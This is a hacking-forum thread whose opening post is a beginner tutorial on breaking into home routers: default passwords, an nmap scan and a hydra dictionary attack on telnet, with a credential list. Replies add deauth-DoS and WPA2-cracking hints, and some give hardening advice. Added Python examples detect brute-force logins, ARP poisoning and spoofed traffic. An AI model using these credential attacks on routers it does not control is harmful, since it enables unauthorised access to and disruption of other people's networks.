Router hacking
  • chroniccommand
    Posts: 1,389
    [--------------------------------------------------------]
    Paper/Tutorial name: Router Hacking
    Written by: Chroniccommand
    For: CodeShock
    Difficulty: Easy to Intermediate
    State: Work in progress
    [--------------------------------------------------------]
    Table of Contents
    1..........Credits
    2..........Intro
    3..........Basics of a router
    4..........Insecurities
    5..........Brute-forcing // Dictionary attacks
    6..........More to come??
    [-----------------------------------------------------------]
    Credits
    I (Chroniccommand) have written this paper/tutorial by myself. I thank Vivek for teaching me.
    ------------------------------------------------------------\\
    Intro
    Router hacking can be very useful. You can use it to gain access into a router's settings and fuck around with everything > : ) THIS IS NOT A TUTORIAL FOR CRACKING WEP.
    --------------------------------------------------------------\\
    Basics of a router
    You should all know what a router is. A router forwards data in and out of a network.
    http://upload.wikimedia.org/wikipedia/commons/f/f6/SPOF.png
    The image above shows a router communicating between the computers and server. Common types of routers include:
    #Cisco
    #Linksys
    #SMC
    #Netcomm
    #Belkin
    #Netgear
    #And a lot more
    (Possibly more to come for this section)
    ---------------------------------------------------------\\
    Insecurities
    So, you may be asking yourself, what can I do in the router settings? Well, you can do a lot of things actually. You can forward ports, deny internet for a specific computer, disable the router, etc. Some insecurities include:
    #Not changing the default password
    #Weak password
    #Mis-configurations
    #SNMP attacks
    #And more...
    Generally you would log into the router by going to the address "192.168.1.1" in your browser, but it may be different. Try going into your terminal and typing "ifconfig" without the quotes. You should see something like this in the wlan0 section (if you're using Wi-Fi):

    wlan0 Link encap:Ethernet HWaddr 00:24:xx:xx:xx:xx
    inet addr:192.168.1.5 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::224:xxxx:xxxx:xxxx/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1492 Metric:1
    RX packets:17305 errors:0 dropped:0 overruns:0 frame:0
    TX packets:13335 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:19241168 (19.2 MB) TX bytes:1859804 (1.8 MB)

    I blocked out some stuff with x's btw. See where it says "inet addr"? That is your LAN IP. Mine is "192.168.1.5", so the login page should be at "192.168.1.1". From there you can log in. You may want to try default passwords first. Try something like "Admin" for the username and "password" for the password. Here is a list of default passwords: http://www.phenoelit-us.org/dpl/dpl.html
    --------------------------------------------------------------------------------------\\
    Brute-force // Dictionary attacks
    So what do we do if we do not have access to the router because we don't know the password? The answer is simple: brute force it or use a dictionary attack. For this particular section I will be using hydra. For this demo I am running BackTrack 4 (because it comes with all the tools). Let's first do an nmap scan on the router:
    'nmap -sS 192.168.1.1'
    I get this type of input for my router (Keep in mind I purposely opened ports for this demo)

    PORT STATE SERVICE
    80/tcp open http
    23/tcp open ssh
    22/tcp open telnet
    5678/tcp open unknown
    MAC Address: 00:0F:66:9A:71:83 (Cisco-Linksys)

    Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds

    So we see that http, ssh, telnet and an unknown port are open. Now I'm going to try to telnet the router.
    'telnet 192.168.1.1 23'
    I get this output:

    Vyatta login:

    I try the default passwords to the router but they don't work =/ So our next option is a dictionary attack. Make sure you have hydra configured correctly on your machine. So what I'm going to do is make a file with some usernames and passwords in it, like so:

    vyatta:password
    vyatta:admin
    admin:password
    admin:admin
    administrator:admin
    administrator:password
    administrator:password1
    admin:password1
    vyatta:vyatta

    This is just a quick list of defaults I got. As you can see, the order goes 'username:password', separated with a ':'. You may want to download a dictionary file as you will probably have more success. So now hydra comes in. Let's try 'hydra' and see the options. The option '-C' should work here. Let's try this command:
    'hydra -C dictionary -s 23 192.168.1.1 telnet'
    This will try all usernames and passwords in the file 'dictionary'. We get the output as username == vyatta, password == admin. So telnet back to the router and log in with those credentials. Great success :mrgreen: We now have access with help from a dictionary attack *thumbs up*
    STILL WORKING ON THIS SECTION! Expect it soon.
    ----------------------------------------------------------------------------\\
    More to come??
    This tutorial is still a work in progress; I will add more techniques, like using Netcat to log in to a router and maybe gain root ;). I will also be adding sections for SNMP attacks etc. If anybody has any suggestions please shout out.
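    As an added, defender-side example (not code from chroniccommand's post), here is a small detector that reads the kind of syslog lines a Linux-based router writes for telnet logins and flags exactly what the dictionary attack above leaves behind: a burst of failed logins from one host, then a success. The log excerpt, hosts, PIDs and the login[...] message format are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed syslog excerpt in the style a Linux-based router (e.g. Vyatta) writes
# for telnet logins; the hosts, PIDs and messages are made up for this example.
SAMPLE_LOG = """\
Mar  3 10:00:01 router login[2210]: FAILED LOGIN (1) on '/dev/pts/0' from '192.168.1.5' FOR 'admin', Authentication failure
Mar  3 10:00:02 router login[2210]: FAILED LOGIN (2) on '/dev/pts/0' from '192.168.1.5' FOR 'admin', Authentication failure
Mar  3 10:00:02 router login[2211]: FAILED LOGIN (1) on '/dev/pts/1' from '192.168.1.5' FOR 'administrator', Authentication failure
Mar  3 10:00:03 router login[2212]: FAILED LOGIN (1) on '/dev/pts/2' from '192.168.1.5' FOR 'vyatta', Authentication failure
Mar  3 10:00:03 router login[2213]: FAILED LOGIN (1) on '/dev/pts/3' from '192.168.1.5' FOR 'vyatta', Authentication failure
Mar  3 10:00:04 router login[2213]: LOGIN ON '/dev/pts/3' BY 'vyatta' FROM '192.168.1.5'
Mar  3 10:30:00 router login[2300]: FAILED LOGIN (1) on '/dev/pts/0' from '192.168.1.7' FOR 'vyatta', Authentication failure
"""

FAIL_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: FAILED LOGIN \(\d+\) "
                     r"on '\S+' from '([\d.]+)' FOR '(\w+)'")
OK_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: LOGIN ON '\S+' "
                   r"BY '(\w+)' FROM '([\d.]+)'")

def parse_ts(stamp, year=2010):
    """Syslog stamps carry no year; assume one so the lines can be ordered."""
    return datetime.strptime(f"{year} {' '.join(stamp.split())}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return {source IP: [alert, ...]}: a host that produced `threshold` failures
    inside `window`, and a success that follows such failures (a found pair)."""
    recent = defaultdict(deque)   # source IP -> failure timestamps inside the window
    alerts = defaultdict(list)
    flagged = set()               # alert once per source for the burst itself
    for line in log_text.splitlines():
        fail, ok = FAIL_RE.match(line), OK_RE.match(line)
        if not (fail or ok):
            continue
        ts = parse_ts((fail or ok).group(1))
        src = fail.group(2) if fail else ok.group(3)
        q = recent[src]
        while q and ts - q[0] > window:   # slide the window forward
            q.popleft()
        if fail:
            q.append(ts)
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts[src].append(f"{len(q)} failed logins within {window.seconds}s, last user tried {fail.group(3)!r}")
        elif q:   # success right after failures from the same host
            alerts[src].append(f"successful login as {ok.group(2)!r} after {len(q)} recent failures")
    return dict(alerts)
```

    The same logic applies to SSH or the web login as long as the two regexes are adapted to that daemon's message format.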
  • Xin
    Posts: 3,251
    Great tutorial, I guess 50% of router passwords are blank!
    Xin
  • Bursihido
    Posts: 406
    Very nice tut, thank you.
  • GameOver
    Posts: 675
    I see all your posts, and they are excellent! You deserve + rep!

    Good work again!
  • Cool!
    Thanks :)
  • I used to use nmap...!!
    Now I'm learning some coding langs..!!
  • mandi
    Posts: 207
    Hmmm, what about adding some tutorials based on different types of router attacks?

    Like "hit and run attacks"; I don't remember all the types. I had seen those advanced topics in an e-book from CEH. If possible, download the CEH v6 e-books and go to the "router hacking module" and see the types of attacks in it, and write tutorials for them, because they cover some of the advanced ways of "attacking routers".


    Just a suggestion though; if possible, consider it...
    It will be worth your time too :)
  • You can also try deauthing everyone on that particular network to DoS instead of locking them out, because that actually requires access.
  • George
    Posts: 707
    Nice tutorial there, thanks for sharing this.

    Someone should write a guide about router protection / security. I have a NETGEAR wireless router; I've changed the password from the default "password", and I've added a WEP key. Nevertheless, I don't know much about the security of routers.
  • Sh3llc0d3
    Posts: 1,910
    said:

        Nice tutorial there, thanks for sharing this.

        Someone should write a guide about router protection / security. I have a NETGEAR wireless router; I've changed the password from the default "password", and I've added a WEP key. Nevertheless, I don't know much about the security of routers.

    For Max. security:
    - Upgrade to WPA or WPA2 encryption. Most people will give up if they know it's either of these encryptions; it takes too long to crack.
    - Make a note of the MAC addresses on the network and "filter the MAC addresses" so only they can connect.
    - Apart from that, if you're running a large network it might be worthwhile running a program such as ARPwatch (for Linux) which notifies you / blocks attempts when your ARP cache gets altered, preventing ARP poisoning/sniffing/MITM.
    - Keep a general eye out (if you don't filter MAC addresses) for extra MAC addresses in the router page/device list that don't match any you recognise... if you need to know which MAC addresses go with which computers, a quick NMAP scan will tell you. This will let you know if anyone's connecting to your router.
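    Sh3llc0d3's last points (ARPwatch-style monitoring plus a note of the known MAC addresses) can be combined into one check. This is an added example, not code from the thread or from ARPwatch: it diffs two `arp -n` snapshots and flags an IP whose MAC flipped (what poisoning of the gateway entry looks like) and any MAC missing from the allow-list. Both snapshots and the allow-list are constructed; only the router MAC comes from the nmap output earlier in the thread.

```python
import re

# Constructed `arp -n` snapshots from a Linux host, taken a few minutes apart.
SNAPSHOT_BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:0f:66:9a:71:83   C                     wlan0
192.168.1.5              ether   00:24:aa:bb:cc:dd   C                     wlan0
192.168.1.8              ether   00:1c:11:22:33:44   C                     wlan0
"""
SNAPSHOT_AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:24:aa:bb:cc:dd   C                     wlan0
192.168.1.5              ether   00:24:aa:bb:cc:dd   C                     wlan0
192.168.1.8              ether   00:1c:11:22:33:44   C                     wlan0
192.168.1.200            ether   08:00:27:de:ad:00   C                     wlan0
"""

# The "note of the MAC addresses on the network", kept as an allow-list (constructed).
KNOWN_MACS = {
    "00:0f:66:9a:71:83": "router",
    "00:24:aa:bb:cc:dd": "laptop",
    "00:1c:11:22:33:44": "desktop",
}

ARP_LINE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+ether\s+([0-9a-f:]{17})\s", re.I)

def parse_arp(text):
    """Map IP -> lowercased MAC for each resolved entry of an `arp -n` dump."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def audit_arp(before, after, known_macs):
    """Return (kind, ip, detail) alerts. 'changed': an IP's MAC differs between the
    snapshots (ARPwatch's 'changed ethernet address'); 'unknown': MAC not allow-listed."""
    old, new = parse_arp(before), parse_arp(after)
    alerts = []
    for ip, mac in sorted(new.items()):
        if ip in old and old[ip] != mac:
            alerts.append(("changed", ip, f"{old[ip]} -> {mac}"))
        if mac not in known_macs:
            alerts.append(("unknown", ip, mac))
    return alerts

if __name__ == "__main__":
    for alert in audit_arp(SNAPSHOT_BEFORE, SNAPSHOT_AFTER, KNOWN_MACS):
        print(*alert)
```

    Run against live snapshots (for example `arp -n` captured every minute by cron) the 'changed' alert on the gateway's IP is the one to react to first.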
  • I agree with Semtex.
    WPA2-PSK is crackable now, not too hard.
    My earlier post kind of hinted at it.
    It's just a new process, a little packet sniffing, and one replay.
    Not too hard.
    As for ARP, ARP poisoning wins. Just sayin'.
  • Something you can do to harden all routers, especially at the border end of a network, is to set up INGRESS and EGRESS filtering. That is why so many kiddie DoS attacks still work today: without these measures in place, the edge routers will look at a packet's destination or source and blindly deliver it anywhere! As far as switch protection, one could use static mapping of ARP tables and port security, instead of relying on dynamic tables. Just my 2 cents.
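    The ingress/egress filtering recommended above, written out as an added example (not from the post) so the decision an edge router makes is explicit: inbound packets that claim one of our own addresses or a private source are dropped, and outbound packets whose source is not our own prefix are dropped, which is what stops spoofed-source DoS traffic from leaving or entering. The prefix 203.0.113.0/24, the interface names "wan"/"lan" and the sample packets are assumptions for the example.

```python
import ipaddress

# Hypothetical edge-router topology for the example: "wan" faces the Internet,
# "lan" holds our own prefix (a documentation range from RFC 5737).
OUR_PREFIX = ipaddress.ip_network("203.0.113.0/24")
# Ranges that should never be a source arriving from the Internet nor a
# destination leaving our network: RFC 1918 private space plus a few others.
BOGONS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "0.0.0.0/8", "169.254.0.0/16")]

def edge_filter(iface, src, dst):
    """Ingress/egress (anti-spoofing) decision for one packet at the border.
    Returns ("forward" | "drop", reason)."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if iface == "wan":                       # ingress: arriving from the Internet
        if s in OUR_PREFIX:
            return ("drop", "ingress: outside packet claims one of our own addresses")
        if any(s in b for b in BOGONS):
            return ("drop", "ingress: private/bogon source address")
        if d not in OUR_PREFIX:
            return ("drop", "ingress: not addressed to us, refuse to relay")
        return ("forward", "ingress: ok")
    if iface == "lan":                       # egress: leaving our network
        if s not in OUR_PREFIX:
            return ("drop", "egress: source is not from our prefix (spoofed)")
        if any(d in b for b in BOGONS):
            return ("drop", "egress: private/bogon destination never leaves")
        return ("forward", "egress: ok")
    raise ValueError(f"unknown interface {iface!r}")

# Constructed sample packets: (interface the packet arrived on, source, destination)
SAMPLE_PACKETS = [
    ("wan", "198.51.100.9", "203.0.113.10"),   # normal inbound traffic
    ("wan", "203.0.113.7", "203.0.113.10"),    # claims our own address from outside
    ("wan", "10.1.1.1", "203.0.113.10"),       # private source from the Internet
    ("lan", "203.0.113.10", "198.51.100.9"),   # normal outbound traffic
    ("lan", "192.168.1.5", "198.51.100.9"),    # spoofed source trying to leave
]

def check_samples():
    """Return the verdict for each sample packet, in order."""
    return [edge_filter(*pkt)[0] for pkt in SAMPLE_PACKETS]

if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS:
        print(pkt, *edge_filter(*pkt))
```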